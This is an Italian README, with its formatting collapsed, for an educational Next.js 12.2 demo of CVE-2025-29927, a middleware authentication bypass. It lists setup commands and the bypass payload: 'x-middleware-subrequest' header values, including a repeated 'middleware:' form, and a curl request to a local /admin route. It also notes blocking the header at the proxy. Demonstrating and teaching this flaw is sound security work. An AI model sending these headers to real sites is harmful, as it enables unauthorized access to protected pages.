
🔓 Next.js Auth Bypass Demo - Applicazione educativa che dimostra la vulnerabilità di bypass dell'autenticazione middleware CVE-2025-29927 . ⚠️ Solo per uso educativo.[Realizzato utilizzando l'IA]
Una semplice applicazione proof of concept Next.js 12.2.
npm install
npm run dev
L'applicazione sarà disponibile all'indirizzo http://localhost:3000
npm run dev - Avvia il server di svilupponpm run build - Compila per la produzionenpm run start - Avvia il server di produzioneModifica pages/index.js per modificare la pagina Hello World. L'applicazione utilizza stili inline per semplicità, ma puoi aggiungere file CSS o librerie di stili come necessario.
Questa applicazione dimostra la vulnerabilità CVE-2025-29927 scoperta da Rachid.A (zhero) e Yasser Allam (inzo_):
x-middleware-subrequestadminadminx-middleware-subrequest: middlewarecurl -H "x-middleware-subrequest: middleware" http://localhost:3000/adminx-middleware-subrequest: middlewarex-middleware-subrequest: src/middlewarex-middleware-subrequest: middleware:middleware:middleware:middleware:middlewarex-middleware-subrequest a livello di proxy/CDN⚠️ AVVERTENZA: Questo dimostra una CVE reale solo a scopo educativo!
Questa applicazione utilizza stili inline per semplicità. Per un'app in produzione, considera l'utilizzo di:
Buon coding! 🚀